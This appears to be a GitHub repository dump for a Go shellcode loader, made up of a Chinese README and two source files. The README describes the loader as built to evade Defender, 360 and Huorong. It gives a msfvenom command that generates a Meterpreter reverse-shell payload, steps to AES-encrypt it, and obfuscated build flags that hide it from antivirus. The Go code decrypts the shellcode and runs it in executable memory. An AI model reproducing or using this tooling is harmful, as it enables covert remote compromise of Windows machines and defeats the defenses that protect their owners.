├── README.md ├── aes_sc.go └── go-sc.go /README.md: -------------------------------------------------------------------------------- 1 | # go-shellcode-loader 2 | 3 | GO混淆免杀shellcode加载器AES加密 4 | 5 | 混淆反检测 过DF、360和火绒 6 | 7 | 8 | #### 获取项目 9 | 10 | ```Bash 11 | git clone https://github.com/HZzz2/go-shellcode-loader.git 12 | cd go-shellcode-loader 13 | //下条命令安装第三方混淆库 GitHub地址:https://github.com/burrowers/garble 14 | go install mvdan.cc/garble@latest 15 | 16 | ``` 17 | 18 | #### 生成shellcode并base64 19 | 20 | `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw` 21 | 22 | `base64 -w 0 -i rev.raw > rev.bs64` 23 | 24 | `cat rev.bs64` 25 | 26 | **复制到aes-sc.go中的51行替换payload** 27 | 28 | 运行aes-sc.go生成AES加密后的值 29 | 30 | `go run aes_sc.go` 31 | 32 | 复制输出的值到go-sc.go中的73行替换payload 33 | 34 | #### **编译成exe可执行程序** 35 | 36 | `garble -tiny -literals -seed=random build -ldflags="-w -s -H windowsgui" -race go-sc.go` 37 | 38 | 参数解释: 39 | 40 | garble(混淆库): 41 | 42 | -tiny 删除额外信息 43 | 44 | -literals 混淆文字 45 | 46 | -seed=random base64编码的随机种子 47 | 48 | go: 49 | 50 | -w 去掉调试信息,不能gdb调试了 51 | 52 | -s 去掉符号表 53 | 54 | -H windowsgui 隐藏执行窗口,不占用 cmd 终端。 (被查杀率高) 55 | 56 | -race 使数据允许竞争检测,编译时改变了生成后的文件特征, 使得杀软无法检测,当然有一天也会失效的。 57 | 58 | 编译后得到go-sc.exe 59 | 60 | #### 检测图 61 | 62 | **火绒** 63 | 64 | ![image](https://user-images.githubusercontent.com/22775890/172315590-c32aa9ad-0b2b-43cd-a96c-45d971a83ef5.png) 65 | 66 | 67 | **360杀毒** 68 | 69 | ![image](https://user-images.githubusercontent.com/22775890/172315610-9bfa9d41-31a1-42d5-bd54-b0ce3e73318d.png) 70 | 71 | 72 | **360卫士** 73 | 74 | ![image](https://user-images.githubusercontent.com/22775890/172315642-73266f42-6019-42b7-bb02-5dd59b0925b7.png) 75 | 76 | 77 | 78 | **DF** 79 | 80 | ![image](https://user-images.githubusercontent.com/22775890/172315670-89a23a36-5e1f-40e8-b311-a4a22490d1ca.png) 81 | 82 | 83 | 84 | **virustotal** 85 | 86 | ![image](https://user-images.githubusercontent.com/22775890/172315706-4fbd57a6-0e14-497a-af91-ea6c7cdf0704.png) 87 | 88 | 89 | 90 | **微步云杀箱** 91 | 92 | ![image](https://user-images.githubusercontent.com/22775890/172315732-84eb7a75-481c-4904-a341-bd96a336ad87.png) 93 | 94 | 95 | 96 | 97 | **运行效果** 98 | 99 | 100 | 101 | 102 | https://user-images.githubusercontent.com/22775890/172315782-707cfbbb-90ed-4156-97d8-dcaf0da8a554.mp4 103 | 104 | 105 | ## 免责声明 106 | 仅供安全研究与教学之用,如果使用者将其做其他用途,由使用者承担全部法律及连带责任,本人不承担任何法律及连带责任。 107 | -------------------------------------------------------------------------------- /aes_sc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bytes" 5 | "crypto/aes" 6 | "crypto/cipher" 7 | "encoding/base64" 8 | "fmt" 9 | ) 10 | 11 | func CheckError(err error) { 12 | if err != nil { 13 | panic(err) 14 | } 15 | } 16 | 17 | //填充字符串(末尾) 18 | func PaddingText1(str []byte, blockSize int) []byte { 19 | //需要填充的数据长度 20 | paddingCount := blockSize - len(str)%blockSize 21 | //填充数据为:paddingCount ,填充的值为:paddingCount 22 | paddingStr := bytes.Repeat([]byte{byte(paddingCount)}, paddingCount) 23 | newPaddingStr := append(str, paddingStr...) 24 | //fmt.Println(newPaddingStr) 25 | return newPaddingStr 26 | } 27 | 28 | //---------------DES加密 解密-------------------- 29 | func EncyptogAES(src, key []byte) []byte { 30 | block, err := aes.NewCipher(key) 31 | if err != nil { 32 | fmt.Println(nil) 33 | return nil 34 | } 35 | src = PaddingText1(src, block.BlockSize()) 36 | blockMode := cipher.NewCBCEncrypter(block, key) 37 | blockMode.CryptBlocks(src, src) 38 | return src 39 | 40 | } 41 | 42 | func main() { 43 | //payload替换 44 | str := "payload" 45 | //密钥长度16 46 | key := []byte("LeslieCheungKwok") 47 | src := EncyptogAES([]byte(str), key) 48 | base64Str := base64.StdEncoding.EncodeToString(src) 49 | fmt.Println("加密后的数据为:", base64Str) 50 | 51 | } 52 | -------------------------------------------------------------------------------- /go-sc.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "encoding/base64" 7 | "fmt" 8 | "syscall" 9 | "unsafe" 10 | ) 11 | 12 | var ( 13 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 14 | VirtualAlloc = kernel32.NewProc("VirtualAlloc") 15 | RtlMoveMemory = kernel32.NewProc("RtlMoveMemory") 16 | ) 17 | 18 | func build(ddm string) { 19 | sDec, _ := base64.StdEncoding.DecodeString(ddm) 20 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(sDec)), 0x1000|0x2000, 0x40) 21 | _, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&sDec[0])), uintptr(len(sDec))) 22 | syscall.Syscall(addr, 0, 0, 0, 0) 23 | 24 | } 25 | 26 | 27 | 28 | //去掉字符(末尾) 29 | func UnPaddingText1(str []byte) []byte { 30 | n := len(str) 31 | count := int(str[n-1]) 32 | newPaddingText := str[:n-count] 33 | return newPaddingText 34 | } 35 | 36 | //---------------DES解密-------------------- 37 | 38 | 39 | func DecrptogAES(src, key []byte) []byte { 40 | block, err := aes.NewCipher(key) 41 | if err != nil { 42 | fmt.Println(nil) 43 | return nil 44 | } 45 | blockMode := cipher.NewCBCDecrypter(block, key) 46 | blockMode.CryptBlocks(src, src) 47 | src = UnPaddingText1(src) 48 | return src 49 | } 50 | 51 | func main() { 52 | str := "payload" 53 | key := []byte("LeslieCheungKwok") 54 | base_byte, _ := base64.StdEncoding.DecodeString(str) 55 | build(string(DecrptogAES(base_byte, key))) 56 | } 57 | --------------------------------------------------------------------------------